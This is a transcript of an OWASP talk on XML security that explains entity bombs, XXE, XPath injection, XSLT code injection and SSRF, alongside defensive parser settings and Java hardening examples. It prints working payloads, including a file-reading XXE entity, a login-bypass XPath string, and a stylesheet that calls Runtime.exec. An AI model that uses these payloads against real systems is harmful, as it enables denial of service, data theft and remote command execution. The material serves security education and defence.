XML Attack Surface - Pierre Ernst (OWASP Ottawa)

XML processing security vulnerabilities and how to avoid them.

  1. XML Attack Surface, Business Analytics Security Competency Group. Pierre Ernst, 2013
  2. XML is Pervasive
  3. XML intro
     ■ Born in 1998 (see initial specifications)
     ■ Data interchange format
       – International languages support
       – Text based
       – Human readable
     ■ Parsers
       – DOM
       – SAX, rooted in Ottawa (see bio)
       – StAX
     ■ Complementary technologies and standards
       – XML Validation (DTD, XSD, ...)
       – XML Transformation (XSLT)
       – XML Query (XQuery, XPath)
  4. Is XML Secure?
     ■ Nothing wrong with the standard itself
     ■ Most vulnerabilities are due to
       – Libraries/Tools misconfiguration
       – Insufficient validation of untrusted input
     ■ Known, reported security vulnerabilities (see CVE search)
  5. XML Bomb
     ■ CWE-776: Denial of service (memory exhaustion)
     ■ Amit Klein, 2002 (see BugTraq)
     ■ XML entity expansion
         <!DOCTYPE ibm [
           <!ENTITY ernst128 "pierre">
           <!ENTITY ernst127 "&ernst128;&ernst128;">
           ...
           <!ENTITY ernst002 "&ernst003;&ernst003;">
           <!ENTITY ernst001 "&ernst002;&ernst002;">
           <!ENTITY ernst000 "&ernst001;&ernst001;">
         ]>
         <ibm>&ernst000;</ibm>
  6. Modus Operandi (sequence diagram, Attacker → Vulnerable Server)
     (1) The attacker sends POST /request HTTP/1.1 with the body <ibm>&ernst000;</ibm>.
     (2) The server expands the entities level by level: <ibm>&ernst001;&ernst001;</ibm>, then <ibm>&ernst002;&ernst002;&ernst002;&ernst002;</ibm>, then eight &ernst003; references, and so on, doubling at every level until memory is exhausted.
  7. Demo #1: Server Crash with XML Bomb (Source code available on demand)
  8. Variation: “Quadratic Blowup Attack”
     ■ Amit Klein (see MSDN article)
     ■ Uses one single entity of size 50KB
     ■ References the entity 50,000 times
     ■ Useful to bypass FEATURE_SECURE_PROCESSING protection
       – Limits entity expansions to
         • 100,000 (IBM)
         • 64,000 (Oracle)
         <!DOCTYPE pierre [
           <!ENTITY e "eeeeeeeeeeee...eeeeeeeee">
         ]>
         <pierre>&e;&e;&e;...&e;&e;&e;</pierre>
  9. Protection
     DOM, SAX:  factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
     StAX:      factory.setProperty(XMLInputFactory.IS_REPLACING_ENTITY_REFERENCES, false);
  10. External Entity Reference (XXE)
     ■ CWE-611: Information Disclosure
     ■ Gregory Steuck, 2002 (see BugTraq)
     ■ Requires the server to include user-supplied data in the response
         <!DOCTYPE pierre [
           <!ENTITY ernst SYSTEM "file:///c:/windows/win.ini">
         ]>
         <pierre>&ernst;</pierre>
  11. Modus Operandi (sequence diagram, Attacker → Vulnerable Server)
     (1) The attacker sends POST /request HTTP/1.1 with the body <pierre>&ernst;</pierre>.
     (2) The server resolves the external entity, so the document becomes <pierre>[... content of the file on the server ...]</pierre>.
     (3) The server answers HTTP/1.1 200 OK, Content-Type: text/xml, with <response>Unknown service [... content of the file on the server ...]</response>, echoing the file content back to the attacker.
  12. Demo #2: File Content Disclosure with XXE (Source code available on demand)
  13. Protection
     DOM, SAX:  factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
     StAX:      factory.setProperty(XMLInputFactory.IS_REPLACING_ENTITY_REFERENCES, false);
  14. Blind XPath Injection (“XML Injection”)
     ■ CWE-643: Abuse of Functionality
     ■ Amit Klein, 2004 (see white-paper)
     ■ User input is embedded as-is in the XPath statement
         <users>
           <user>
             <name>pierre</name>
             <password>i8simon</password>
           </user>
           <user>
             <name>trevor</name>
             <password>mee2</password>
           </user>
         </users>
     The login form fields are concatenated into
         //users/user[name/text()='...' and password/text()='...']/name/text()
     With the legitimate input pierre / i8simon (password shown masked) the query matches one user; with ' or ''=' in both fields the predicate is always true.
  15. Modus Operandi (sequence diagram, Attacker → Vulnerable Server)
     (1) The attacker sends POST /login HTTP/1.1 with ' or ''=' as both name and password.
     (2) The server builds //users/user[name/text()='' or ''='' and password/text()='' or ''='']/name/text().
     (3) The server answers HTTP/1.1 200 OK, Content-Type: text/html: the query matches every user, and the names pierre and trevor come back without any password being known.
  16. Demo #3: Blind XPath Injection (Source code available on demand)
  17. Variation: Read System Properties
     ■ JAXP implementation:
       – IBM
       – Oracle
     ■ Interesting properties:
       – os.version
       – user.name
       – java.class.path
       – sun.java.command
     system-property('sun.java.command')
  18. Protection
     ■ Input validation.
     ■ “[A-Za-z0-9_-]+” in our example.
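As an added example (not code from the slides or the demos), the login lookup from slides 14 and 18 in Java: the concatenated query the talk describes beside a version that applies the [A-Za-z0-9_-]+ allow-list and hands the values to the engine as XPath variables. The class name XPathLogin and the method names are assumptions, and the users document is a constructed copy of slide 14.

```java
import java.io.StringReader;
import java.util.regex.Pattern;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.xpath.XPath;
import javax.xml.xpath.XPathFactory;
import org.w3c.dom.Document;
import org.xml.sax.InputSource;

public class XPathLogin {  // hypothetical class name, not from the slides
    // Constructed copy of the users document shown on slide 14.
    static final String USERS =
        "<users><user><name>pierre</name><password>i8simon</password></user>"
        + "<user><name>trevor</name><password>mee2</password></user></users>";
    // Allow-list from slide 18; anything else is rejected before a query is built.
    static final Pattern ALLOWED = Pattern.compile("[A-Za-z0-9_-]+");

    static Document users() throws Exception {
        DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
        f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        return f.newDocumentBuilder().parse(new InputSource(new StringReader(USERS)));
    }
    // Vulnerable shape from slide 14: the form fields are concatenated into the XPath text.
    static String vulnerableLogin(String name, String password) throws Exception {
        String q = "//users/user[name/text()='" + name + "' and password/text()='"
            + password + "']/name/text()";
        return XPathFactory.newInstance().newXPath().evaluate(q, users());
    }

    // Hardened: allow-list first, then pass the values as XPath variables so they are never query text.
    static String safeLogin(String name, String password) throws Exception {
        if (!ALLOWED.matcher(name).matches() || !ALLOWED.matcher(password).matches()) {
            return "";  // rejected input: no XPath is evaluated at all
        }
        XPath xp = XPathFactory.newInstance().newXPath();
        xp.setXPathVariableResolver(v -> {
            switch (v.getLocalPart()) {
                case "name": return name;
                case "password": return password;
                default: return null;
            }
        });
        return xp.evaluate("//users/user[name/text()=$name and password/text()=$password]/name/text()", users());
    }

    public static void main(String[] args) throws Exception {
        String inj = "' or ''='";  // the slide 14 input that makes the predicate always true
        System.out.println("concatenated query, injected input -> " + vulnerableLogin(inj, inj));
        System.out.println("allow-list + variables, injected input -> '" + safeLogin(inj, inj) + "'");
        System.out.println("allow-list + variables, pierre/i8simon -> " + safeLogin("pierre", "i8simon"));
    }
}
```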
  19. Code Injection during XSLT
     ■ CWE-94: Improper Control of Generation of Code
     ■ When the attacker can control the XML style sheet applied to an XML document.
     ■ Uses transformer engine extension capabilities
         <xsl:stylesheet version="1.0"
             xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
             xmlns:rt="xalan://java.lang.Runtime"
             exclude-result-prefixes="rt">
           <xsl:template match="/">
             <xsl:variable name="obj" select="rt:getRuntime()"/>
             <xsl:value-of select="rt:exec($obj,'calc.exe')"/>
           </xsl:template>
         </xsl:stylesheet>
  20. Modus Operandi (sequence diagram, Attacker → Vulnerable Server)
     (1) The attacker sends GET /request?doc=...&stylesheet=... HTTP/1.1, where doc is a harmless <doc>whatever</doc> and stylesheet is the malicious style sheet.
     (2) The transformer loads the class java.lang.Runtime.
     (3) The transformer calls its exec() method.
  21. Demo #4: Remote OS Command Injection (Source code available on demand)
  22. Variation #1: Universal XXE
     ● “Universal”: you always see the entity in the response
         <!DOCTYPE xsl:stylesheet [
           <!ENTITY ernst SYSTEM "file:///c:/windows/win.ini">
         ]>
         <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
           <xsl:template match="/">
             &ernst;
           </xsl:template>
         </xsl:stylesheet>
  23. Variation #2: Infinite Loop
         <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
           <xsl:template name="loop">
             <xsl:call-template name="loop"/>
           </xsl:template>
           <xsl:template match="/">
             <xsl:call-template name="loop"/>
           </xsl:template>
         </xsl:stylesheet>
     The root template (1) calls the named template loop, which (2) calls itself without end.
  24. Variation #3: Cross-Site Scripting (XSS)
         <xsl:stylesheet version="1.0"
             xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
             xmlns:xhtml="http://www.w3.org/1999/xhtml">
           <xsl:output method="html"/>
           <xsl:template match="/">
             <xhtml:script>alert('XSS');</xhtml:script>
           </xsl:template>
         </xsl:stylesheet>
  25. Protection
     ■ Several ways to abuse XML Stylesheet Transforms.
     ■ Users should never be able to use custom XML stylesheets.
  26. Server Side Request Forgery (SSRF)
     ■ CWE-601: Open Redirect, but server-to-server
     ■ {Nathan Hamiel, Shawn Moyer}, 2009 (ShmooCon)
     ■ XML vectors:
       – XML eXternal Entities (XXE)
       – XInclude
       – External Doctype inclusion:
         <!DOCTYPE PIERRE PUBLIC "ernst" "http://intranet:666/start-armageddon">
         <pierre/>
  27. Modus Operandi (sequence diagram, Attacker → Vulnerable Server → Internal Service)
     (1) The attacker sends POST /request HTTP/1.1 with Content-Type: application/xml, Content-Length: 666 and a body starting <?xml version="1.0"?> followed by whatever content carries the external reference.
     (2) While parsing, the vulnerable server opens a connection to the internal service named in that reference.
  28. Protection
     DOM, SAX:  factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
     StAX:      factory.setProperty(XMLInputFactory.SUPPORT_DTD, false);
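As an added example (not code from the slides or the demos), the DOM, SAX and StAX settings from the Protection slides 9, 13 and 28 collected in one Java class, with a constructed three-level copy of the slide 5 bomb used to show that the document is refused at the DOCTYPE, before any entity is expanded. The class name HardenedXmlParsers and the helper names are assumptions.

```java
import java.io.ByteArrayInputStream;
import java.nio.charset.StandardCharsets;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.SAXParserFactory;
import javax.xml.stream.XMLInputFactory;
import org.xml.sax.SAXParseException;

public class HardenedXmlParsers {  // hypothetical class name, not from the slides
    // Feature URI from the Protection slides (Xerces-derived parsers, including the JDK's built-in one).
    static final String DISALLOW_DOCTYPE = "http://apache.org/xml/features/disallow-doctype-decl";
    // Constructed sample in the shape of slide 5, cut to three levels so it is harmless to run.
    static final String BOMB = "<!DOCTYPE ibm [\n"
        + " <!ENTITY ernst002 \"pierre\">\n"
        + " <!ENTITY ernst001 \"&ernst002;&ernst002;\">\n"
        + " <!ENTITY ernst000 \"&ernst001;&ernst001;\">\n"
        + "]>\n<ibm>&ernst000;</ibm>";

    static DocumentBuilderFactory domFactory() throws Exception {
        DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
        f.setFeature(DISALLOW_DOCTYPE, true);  // any DOCTYPE, internal subset included, is a fatal error
        return f;
    }

    static SAXParserFactory saxFactory() throws Exception {
        SAXParserFactory f = SAXParserFactory.newInstance();
        f.setFeature(DISALLOW_DOCTYPE, true);  // same feature; SAX sees the DOCTYPE before any entity
        return f;
    }

    static XMLInputFactory staxFactory() {
        XMLInputFactory f = XMLInputFactory.newInstance();
        f.setProperty(XMLInputFactory.SUPPORT_DTD, false);                     // slide 28: no DTD at all
        f.setProperty(XMLInputFactory.IS_REPLACING_ENTITY_REFERENCES, false);  // slides 9/13: no expansion
        return f;
    }
    // true when the DOM parser refuses the document at the DOCTYPE, before a single entity is expanded
    static boolean domRejects(String xml) throws Exception {
        try {
            domFactory().newDocumentBuilder().parse(new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)));
            return false;
        } catch (SAXParseException e) {
            return true;
        }
    }

    public static void main(String[] args) throws Exception {
        System.out.println("DOM rejects the bomb: " + domRejects(BOMB));
    }
}
```

The same factories should be used for every request body the server parses; the slides' point is that the DOCTYPE is refused outright, so neither the 128-level bomb nor the quadratic variant gets as far as the entity-expansion limits of the Secure Processing flag.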
  29. Variation: Exotic Java URL Handlers
     ■ {Alexander Polyakov, Dmitry Chastukhin, Alexey Tyurin}, 2012 (CVE-2012-5085)
  30. Conclusions
     ■ Always configure your XML parsers to disallow Doctype.
       – From a server's perspective, clients should not be able to define the grammar of the request anyway
       – Secure Processing Flag is not enough
       – Preventing external entity expansion is not enough
     ■ XPath: validate user input
     ■ XSLT: avoid at any cost
     ■ Always apply Java patches from vendors
  31. Pierre Ernst
     ■ 10 years as Software Developer
     ■ 5 years as Penetration Tester
       – 750+ vulns
       – Manual Code Review
       – Manual Black Box Testing
       – Java, XML, Open Source, …
     http://ca.linkedin.com/in/pernst
     https://twitter.com/e_rnst
     pierre.ernst@gmail.com
  32. Questions & Answers